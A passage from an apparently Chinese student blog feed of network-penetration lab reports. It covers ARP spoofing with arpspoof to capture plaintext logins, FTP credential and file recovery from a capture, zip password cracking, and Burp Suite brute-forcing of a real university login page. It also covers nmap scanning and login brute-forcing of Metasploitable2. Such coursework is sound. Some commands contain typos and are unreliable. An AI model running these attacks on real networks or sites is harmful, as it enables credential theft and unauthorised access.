alt="在这里插入图片描述"></p><p>然后A尝试一下能不能ping通B</p><p><img src="https://img-blog.csdnimg.cn/20201108160405983.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>ping通了,然后当时我想既然在一个网段了那B应该也能ping通A,而且这样也能抓到包,两全其美!(虽然不太符合原意)</p><p><img src="https://img-blog.csdnimg.cn/20201108160730860.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>果然能ping通<br>然后用Wireshark抓一下刚才B ping A的包,并用过滤语句<code>ip.src == 192.168.238.129</code>来过滤一下</p><p><img src="https://img-blog.csdnimg.cn/20201108160840731.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>完成。</p><h4 id="ARP欺骗"><a href="#ARP欺骗" class="headerlink" title="ARP欺骗"></a>ARP欺骗</h4><ol><li><p><strong>为了捕获A到外网的数据,B实施ARP欺骗攻击,B将冒充该子网的什么实体?</strong></p><blockquote><p>主机B冒充的是子网中的网关</p></blockquote></li><li><p><strong>写出 arpspoof 命令格式&B是否能看到A和外网的通信(A刚输入的帐户和口令)&在互联网上找到任意一个以明文方式传递用户帐号、密码的网站,截图Wireshark中显示的明文信息。</strong></p><p>在这次实验中kali为截取信息的主机B,Win7主机是发送信息的主机A,两个主机在同一个局域网下,主机B冒充网关<br>因为我新装的kali,没有arpspoof,所以我又装了一个</p><blockquote><p><code>sudo apt-get install dsniff</code></p></blockquote><p>开启端口转发,允许主机B转发A发送的数据包</p><blockquote><p><code>ech0 1 > /proc/sys/net/ipv4/ip_forward</code></p></blockquote><p>在攻击之前查一下对方主机的ip<br> <img src="https://img-blog.csdnimg.cn/20201110104317987.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>再查一下局域网的网关<img src="https://img-blog.csdnimg.cn/20201110104343208.jpg#pic_center" alt="在这里插入图片描述"><br>随后开始arp欺骗,arp欺骗的命令格式为</p><blockquote><p><code>arpspoof -i etho -t ip_1 ip_2</code></p></blockquote><p>==ip_1:主机A的ip==<br>==ip_2:网关ip==</p><p><img src="https://img-blog.csdnimg.cn/20201110104830181.jpg#pic_center" alt="在这里插入图片描述"></p><p>然后我们用主机A(Win7)访问某生活网</p><p><img src="https://img-blog.csdnimg.cn/20201110104942318.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>看一下主机B的Wireshark,筛选规则<code>http.request.method == POST</code></p><p><img src="https://img-blog.csdnimg.cn/20201110105105999.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>成功抓到数据</p></li></ol><h4 id="FTP数据还原部分"><a href="#FTP数据还原部分" class="headerlink" title="FTP数据还原部分"></a>FTP数据还原部分</h4><ol><li><p><strong>FTP服务器的IP地址是多少?你是如何发现其为FTP服务器的?</strong></p><p>用ftp作为条件过滤,发现大量基于FTP协议传输的数据包,所以推测是有FTP服务器的。</p><p><img src="https://img-blog.csdnimg.cn/20201108161457181.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>服务器会响应用户的请求,于是用 ‘response’ 过滤</p><p><img src="https://img-blog.csdnimg.cn/20201108161550857.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>发现response的ip原地址都是192.168.182.1,所以ftp的ip地址是192.168.182.1</p></li><li><p><strong>客户端登录FTP服务器的账号和密码分别是什么?</strong></p><p>账号和密码指定是用户发送给ftp服务器的,所以可以用<code>ftp && ip.src == 192.168.182.132</code>过滤,并搜索’request’字段</p><p><img src="https://img-blog.csdnimg.cn/20201108162254246.jpg#pic_center" alt="在这里插入图片描述"></p><p>可得账号:student,密码:sN46i5y。</p></li><li><p><strong>客户端从FTP下载或查看了2个文件,一个为ZIP文件,一个为TXT文件,文件名分别是什么?</strong></p><p>先发一下几个常用文件格式的文件头/文件尾</p><p><img src="https://img-blog.csdnimg.cn/20201108162607333.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>所以搜索zip文件就直接搜索十六进制码‘50 4B 03 04’,找到文件 ‘1.zip’</p><p><img src="https://img-blog.csdnimg.cn/20201108162706949.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><blockquote><p>每个数据包的长度都是固定的,这是因为网络传输的过程中会限制每次传输的数据流长度,对任一数据包采用追踪数据流就可得到完整数据。</p></blockquote><p>随后我们将原始数据另存为1.zip</p><p><img src="https://img-blog.csdnimg.cn/20201108164500608.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后打开1.zip文件,发现里面有张图片,但是需要密码(有锁的图标)</p><p><img src="https://img-blog.csdnimg.cn/20201108164603909.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>在这里采用暴力破解工具fcrackzip,但是我在安装的时候出了一些问题,如下:<br>这是正常的安装指令<code>sudo apt-get install fcrackzip</code></p><p><img src="https://img-blog.csdnimg.cn/20201108165732897.jpg#pic_center" alt="在这里插入图片描述"></p><p>出错的原因是我的软件源还没有更新,更新命令<code>sudo apt-get update</code></p><p><img src="https://img-blog.csdnimg.cn/20201108170100453.jpg#pic_center" alt="在这里插入图片描述"></p><p>随后再安装fcrackzip </p><p><img src="https://img-blog.csdnimg.cn/20201108170139204.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>随后进行暴力破解,我这里有一些常用命令,分享一下</p><p><img src="https://img-blog.csdnimg.cn/20201108170351636.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>破解命令为 <code>fcrack -v -b -c1 -l 6 -u 1.zip</code></p><p><img src="https://img-blog.csdnimg.cn/20201108170504276.jpg#pic_center" alt="在这里插入图片描述"></p><p>解锁可得到企鹅图片</p><p><img src="https://img-blog.csdnimg.cn/20201108170556507.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>txt文件直接搜索’txt’字段可得 ‘复习题.txt’</p><p><img src="https://img-blog.csdnimg.cn/20201108170837539.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>注意要找到FTP-DATA流的 ‘复习题.txt’,只有这个流的能查看到信息(==上文中的zip也是这样==)</p><p><img src="https://img-blog.csdnimg.cn/20201108171746494.jpg#pic_center" alt="在这里插入图片描述"></p></li></ol><h3 id="网站密码破解部分"><a href="#网站密码破解部分" class="headerlink" title="网站密码破解部分"></a>网站密码破解部分</h3><ul><li>利用人们平时常用的词、句破译,如果说暴力破解是一个一个的尝试那么字典破译就是利用人们习惯用人名、地名或者常见的词语设置成密码的习惯进行破译。字典破译速度比暴力破译更快但是有时候密码设置中包含了没有字典库中的词句就无法破解出来了,因此有好的字典是关键。<br>以*****为目标网站,构造字典(wordlist),其中包含你的正确密码,利用burpsuite进行字典攻击,实施字典攻击,你是如何判断某个密码为破解得到的正确密码,截图。</li></ul><p>此次目标网站是某大学学生选课网址,工具使用burpsuite</p><p><img src="https://img-blog.csdnimg.cn/20201108224311662.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>在确认网站代理后,输入账号和一个随便的密码,点击登录,bp就会抓到包</p><p><img src="https://img-blog.csdnimg.cn/20201108230000304.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>开始准备爆破</p><p>攻击类型选择Sniper就行,clear一下再选取密码部分再点击add</p><p><img src="https://img-blog.csdnimg.cn/20201125211813233.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>因为我临时随便设了个6位纯数字密码,所以我的有效载荷类型选的就是数值(Number),范围是000000-999999,每次进1,数字格式像图里一样就行</p><p><img src="https://img-blog.csdnimg.cn/20201108230700944.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>我为了快点,进程数调到了10</p><p><img src="https://img-blog.csdnimg.cn/20201109213001113.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>随后开始攻击</p><blockquote><p>测试的时候知道密码就不用把范围像我这样设得这么广,很费时间的。</p></blockquote><p>结果</p><p><img src="https://img-blog.csdnimg.cn/20201109213202866.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>正确密码的长度和别的长度是不一样的</p><p>然后我又采用了构造字典的方法再破解了一次,载荷类型默认简单清单,把自己构造的包含正确密码的字典载入</p><p><img src="https://img-blog.csdnimg.cn/20201110114649518.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201110114803484.jpg#pic_center" alt="在这里插入图片描述"></p><p>结果ok</p><h4 id="MD5解密"><a href="#MD5解密" class="headerlink" title="MD5解密"></a>MD5解密</h4><p>SqlMap得到某数据库用户表信息,用户口令的MD5值为7282C5050CFE7DF5E09A33CA456B94AE<br>那么,口令的明文是什么?</p><p>我采用的是网站破解密码的方式,一共访问了四个网站:</p><ul><li><p>成功网站:</p><p> <a href="https://www.somd5.com/">https://www.somd5.com/</a></p></li></ul><p><img src="https://img-blog.csdnimg.cn/20201108172822358.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>明文内容为 iampotato</p><ul><li><p>收费网站:</p><p> <a href="https://cmd5.la/user/index.php">https://cmd5.la/user/index.php</a></p><p> <img src="https://img-blog.csdnimg.cn/20201108172901915.jpg#pic_center" alt="在这里插入图片描述"></p><p> <a href="https://www.cmd5.com/">https://www.cmd5.com/</a></p></li></ul><p><img src="https://img-blog.csdnimg.cn/20201108172918608.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><ul><li><p>失败网站:</p><p> <a href="https://www.sojson.com/encrypt_md5.html">https://www.sojson.com/encrypt_md5.html</a></p></li></ul><p><br> <img src="https://img-blog.csdnimg.cn/20201108172937345.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="John-the-Ripper的作用"><a href="#John-the-Ripper的作用" class="headerlink" title="John the Ripper的作用"></a>John the Ripper的作用</h4><p>John the Ripper免费的开源软件,是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如DES、MD4、MD5等。它支持多种不同类型的系统架构,包括Unix、Linux、Windows、DOS模式、BeOS和OpenVMS,主要目的是破解不够牢固的Unix/Linux系统密码。</p><h3 id="问题思考"><a href="#问题思考" class="headerlink" title="问题思考"></a>问题思考</h3><h4 id="如何防止ARP攻击"><a href="#如何防止ARP攻击" class="headerlink" title="如何防止ARP攻击"></a>如何防止ARP攻击</h4><p>很多人的博客缩写的防止arp攻击方法一般都是这三种</p><ul><li>双绑措施</li><li>ARP个人防火墙</li><li>VLAN和交换机端口绑定</li></ul><p>不过我还找到了解决ARP最根本的方法——免疫网络</p><p>免疫网络就是在现有的路由器、交换机、网卡、网线构成的普通交换网络基础上,加入一套安全和管理的解决方案。这样一来,在普通的网络通信中,就融合进了安全和管理的机制,保证了在网络通信过程中具有了安全管控的能力,堵上了普通网络对安全从不设防的先天漏洞。</p><p><a href="https://www.jianshu.com/p/c04c76e2fe96">参考链接</a></p><h4 id="安全密码-口令-应遵循的原则"><a href="#安全密码-口令-应遵循的原则" class="headerlink" title="安全密码(口令)应遵循的原则"></a>安全密码(口令)应遵循的原则</h4><ul><li>避免出现弱密码</li><li>方便用户记忆</li><li>不同平台不建议使用相同密码<h4 id="字典攻击中字典的重要性"><a href="#字典攻击中字典的重要性" class="headerlink" title="字典攻击中字典的重要性"></a>字典攻击中字典的重要性</h4>字典针对弱密码、规律密码、带有特殊字段的密码的攻击很有效,暴力破解这些密码很有可能成功。此外,字典配和社会工程学的应用效果绝对1+1>2,能提高暴破的成功率。<h3 id="实验小结"><a href="#实验小结" class="headerlink" title="实验小结"></a>实验小结</h3></li><li>学会了arp欺骗</li><li>知道了ftp传输协议</li><li>知道了arp攻击原理</li><li>学会了新的Wireshark过滤规则</li><li>学会了用bp暴力破解(部分)</li></ul><p>收获满满,233。</p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ul>
<li>通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>Network scanning & Network investigation</title>
<link href="http://example.com/2020/11/07/Network%20scanning%20&%20Network%20investigation/"/>
<id>http://example.com/2020/11/07/Network%20scanning%20&%20Network%20investigation/</id>
<published>2020-11-07T08:42:01.000Z</published>
<updated>2022-03-18T06:03:46.013Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ul><li>理解Network scanning&Network investigation的作用;通过搭建Network penetration testing平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。</li></ul><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><ul><li>Kali Linux 2;Windows<h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h2></li><li>交换网络结构<h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h2></li><li>Metasploitable2(虚拟机镜像);Nmap(Kali自带);WinHex、数据恢复软件等<h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="文档查找"><a href="#文档查找" class="headerlink" title="文档查找"></a>文档查找</h3>用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档<br>搜索:”network security” filetype:pdf site:<a href="http://www.mit.edu/">www.mit.edu/</a></li></ul><p><strong>谷歌</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101211755433.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201101211800338.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>百度</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101211757637.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="地址查询"><a href="#地址查询" class="headerlink" title="地址查询"></a>地址查询</h3><p>查询此图的地理位置信息</p><p><img src="https://img-blog.csdnimg.cn/20201101212120763.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>首先在马蜂窝上搜索到Le Trentehuit,可以直接得到地址的具体信息(可能因为网速的原因,一直没加载出来),可以看到图片的右边显示的地址具体信息——<br>地址:38 avenue de Suffren,75015 Paris, ,France</p><p><img src="https://img-blog.csdnimg.cn/20201101213418831.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>随后采用百度地图定位到巴黎进行搜索</p><p><img src="https://img-blog.csdnimg.cn/20201101213547531.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>找到之后通过图片确认</p><p><img src="https://img-blog.csdnimg.cn/20201101213625877.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="手机定位"><a href="#手机定位" class="headerlink" title="手机定位"></a>手机定位</h3><p>采用1+品牌的机型进行实验,拨号界面进入手机信息工程模式,一次成功.(HW采用拨号进入的方法没有查到LAC和CID)</p><p><strong>1+手机的信息展示:</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101215204905.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>通过手机获取的LAC和CID查询位置信息</p><p><img src="https://img-blog.csdnimg.cn/20201101215204948.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="编码解码"><a href="#编码解码" class="headerlink" title="编码解码"></a>编码解码</h3><p>通过观察码 Z29vZCBnb29kIHN0dWR5IQ== 的格式发现是Base64格式的码(尾巴的‘==’),所以直接网站解码</p><p><img src="https://img-blog.csdnimg.cn/20201101215347832.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201101215347838.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="地址信息"><a href="#地址信息" class="headerlink" title="地址信息"></a>地址信息</h3><h4 id="查询MAC-amp-IP地址"><a href="#查询MAC-amp-IP地址" class="headerlink" title="查询MAC&IP地址"></a>查询MAC&IP地址</h4><p>内网中捕获到一个以太帧,源MAC地址为:98-CA-33-02-27-B5;目的IP地址为:202.193.64.34。<br>查询:该用户使用的什么品牌的设备,访问的是什么网站?</p><p><strong>MAC地址查询</strong><br><img src="https://img-blog.csdnimg.cn/20201101220543481.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>IP地址查询</strong><br><img src="https://img-blog.csdnimg.cn/20201101221509972.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="查询MAC-amp-IP地址-1"><a href="#查询MAC-amp-IP地址-1" class="headerlink" title="查询MAC&IP地址"></a>查询MAC&IP地址</h4><p>访问<a href="https://whatismyipaddress.com得到myip信息,利用`ipconfig`(windows)或`ifconfig`(linux)查看本机ip地址./">https://whatismyipaddress.com得到MyIP信息,利用`ipconfig`(Windows)或`ifconfig`(Linux)查看本机IP地址。</a><br>答:两者值相同吗?如果不相同的话,说明原因。</p><p><img src="https://img-blog.csdnimg.cn/20201101223119968.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201101223119725.jpg#pic_center" alt="在这里插入图片描述"></p><p><strong>不相同</strong></p><p>网站查询的是公网ip,ipconfig查询的是内网ip,访问网站的时候网络运营商做了NAT,甚至是动态的NAT,所以公网查询到的ip和内网查询到的是不一样的。</p><h3 id="NAMP使用"><a href="#NAMP使用" class="headerlink" title="NAMP使用"></a>NAMP使用</h3><p>先用<code>ifconfig</code>查一下kali的ip,后面排除用。(其实也没啥用(<em>^__^</em>) 嘻嘻……)</p><p><img src="https://img-blog.csdnimg.cn/20201105195304247.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后通过ip和子网掩码,再加上nmap命令查看子网内存活的主机,命令<code>nmap -sP</code></p><p><img src="https://img-blog.csdnimg.cn/20201105200727567.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>通过挨个测试来确定哪个是要渗透的ip,可以通过ip加路由的方式看哪个链接能登录网页</p><h4 id="利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能"><a href="#利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能" class="headerlink" title="利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能"></a>利用NMAP扫描Metasploitable2的端口开放情况并说明其中四个端口的提供的服务,简要说明该服务的功能</h4><p>通过命令<code>nmap -u</code>扫描</p><p><img src="https://img-blog.csdnimg.cn/20201105201648463.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>端口nfs服务</strong></p><p>通过网络,让不同的机器、不同的操作系统可以共享彼此的文件。NFS服务器可以让PC将网络中的NFS服务器共享的目录挂载到本地端的文件系统中,而在本地端的系统中来看,那个远程主机的目录就好像是自己的一个磁盘分区一样,在使用上相当便利。</p><p><strong>端口postgresql服务</strong></p><p>postgres 是 PostgreSQL 数据库服务器。 客户端应用程序为了访问数据库,将通过 TCP Socket 或 Unix domain socket 连接到一个运行中的 postgres 进程。 然后该 postgres 实例将启动(fork)一个新的、独立的服务器进程来处理这个连接。</p><p><strong>端口netbios-ssn服务</strong></p><p>139是NETBIOS Session Service端口,用于提供文件共享服务,主要用于企业内部网之间互相<br>访问,如文件共享或打印等等.若你是单机在互联网上,最好还是将139关了,因为你几乎用不<br>到;若你在企业内部网,就大可不必,因为关掉后没多大意思,非等闲之人也进不了你的企业网。</p><p><strong>端口ccproxy-ftp服务</strong></p><p>用于局域网内共享宽带上网,ADSL共享上网、专线代理共享、ISDN代理共享、卫星代理共享、蓝牙代理共享和二级代理等共享代理上网。</p><h4 id="利用NMAP扫描Metasploitable2的操作系统类型"><a href="#利用NMAP扫描Metasploitable2的操作系统类型" class="headerlink" title="利用NMAP扫描Metasploitable2的操作系统类型"></a>利用NMAP扫描Metasploitable2的操作系统类型</h4><p>使用命令<code>nmap -O</code>检测Metasploitable2操作系统</p><p><img src="https://img-blog.csdnimg.cn/20201105204248260.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="利用NMAP穷举-Metasploitable2上-dvwa-的登录账号和密码"><a href="#利用NMAP穷举-Metasploitable2上-dvwa-的登录账号和密码" class="headerlink" title="利用NMAP穷举 Metasploitable2上 dvwa 的登录账号和密码"></a>利用NMAP穷举 Metasploitable2上 dvwa 的登录账号和密码</h4><p>Nmap 自带有一些脚本,可以用来探测登陆界面或blast登陆界面,首先判断 dvwa 在 80 端口上,用<code>http-auth-finder</code>脚本探测站点上的登录授权页面,发现<code>/dvwa/login.php</code></p><p><img src="https://img-blog.csdnimg.cn/20201105204611508.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>尝试使用类似于<code>http-form-brute</code>的脚本blast出一些账户密码,<code>http-form-brute</code> 传参<code>--script-args=http-form-brute.path=/dvwa/login.php 